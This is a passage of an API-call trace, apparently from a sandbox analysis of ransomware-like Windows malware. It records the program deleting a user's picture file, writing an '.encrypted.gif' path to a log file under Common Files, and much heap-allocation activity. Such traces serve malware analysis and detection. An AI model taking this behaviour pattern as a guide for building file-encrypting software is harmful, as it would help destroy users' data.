lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85ea0bb0, ftCreationTime.dwHighDateTime=0x1d5c145, ftLastAccessTime.dwLowDateTime=0x908cae0, ftLastAccessTime.dwHighDateTime=0x1d5c09c, ftLastWriteTime.dwLowDateTime=0x1818bb20, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1369, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="3Q41yk8hNSN8X6D.gif", cAlternateFileName="3Q41YK~1.GIF")) returned 0x7c2100 [0040.919] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\xmqr1i0\\3q41yk8hnsn8x6d.gif")) returned 1 [0040.920] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85ea0bb0, ftCreationTime.dwHighDateTime=0x1d5c145, ftLastAccessTime.dwLowDateTime=0x908cae0, ftLastAccessTime.dwHighDateTime=0x1d5c09c, ftLastWriteTime.dwLowDateTime=0x1818bb20, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1369, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="3Q41yk8hNSN8X6D.gif", cAlternateFileName="3Q41YK~1.GIF")) returned 0 [0040.921] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0040.921] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.922] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0040.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0040.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0040.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0040.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0040.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0040.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0040.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0040.922] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0040.922] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0040.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0040.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0040.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0040.922] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0040.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0040.922] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0040.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0040.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0040.922] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0040.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0040.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0040.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0040.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0040.923] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0040.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0040.923] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0040.923] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.923] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0040.923] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.923] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0040.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0040.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0040.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.924] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0040.924] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x2f6b, lpOverlapped=0x0) returned 1 [0040.925] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0040.925] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x2f6b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.925] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0040.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0040.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0040.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0040.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.encrypted.gif\r\n", cchWideChar=84, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 84 [0040.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x54) returned 0x794b90 [0040.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.encrypted.gif\r\n", cchWideChar=84, lpMultiByteStr=0x794b90, cbMultiByte=84, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.encrypted.gif\r\n", lpUsedDefaultChar=0x0) returned 84 [0040.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0040.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0040.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x794b90 | out: hHeap=0x770000) returned 1 [0040.925] WriteFile (in: hFile=0x140, lpBuffer=0x87aa40*, nNumberOfBytesToWrite=0x53, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87aa40*, lpNumberOfBytesWritten=0x6aee3c*=0x53, lpOverlapped=0x0) returned 1 [0040.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0040.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.925] CloseHandle (hObject=0x140) returned 1 [0040.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0040.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0040.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0040.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0040.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0040.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0040.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0040.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0040.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0040.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0040.928] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0040.928] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0040.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0040.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0040.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0040.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0040.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0040.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0040.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0040.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0040.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0040.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0040.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0040.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0040.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0040.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0040.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0040.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0040.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0040.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0040.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0040.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0040.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0040.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0040.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0040.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0040.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0040.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0040.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0040.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0040.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0040.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0040.929] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0040.929] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.929] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0040.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0040.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0040.929] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0040.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0040.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0040.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0040.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4c8 [0040.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0040.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0040.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0040.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0040.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0040.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0040.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c748 [0040.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0040.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0040.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0040.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0040.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0040.930] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0040.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0040.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0040.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0040.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0040.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0040.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0040.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0040.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0040.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0040.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0040.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0040.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0040.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0040.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0040.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0040.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0040.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0040.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0040.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0040.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0040.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0040.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0040.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0040.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0040.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0040.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0040.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0040.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0040.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0040.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0040.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0040.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0040.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0040.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0040.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0040.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0040.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0040.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0040.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0040.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0040.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0040.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0040.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0040.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0040.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0040.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0040.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0040.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) 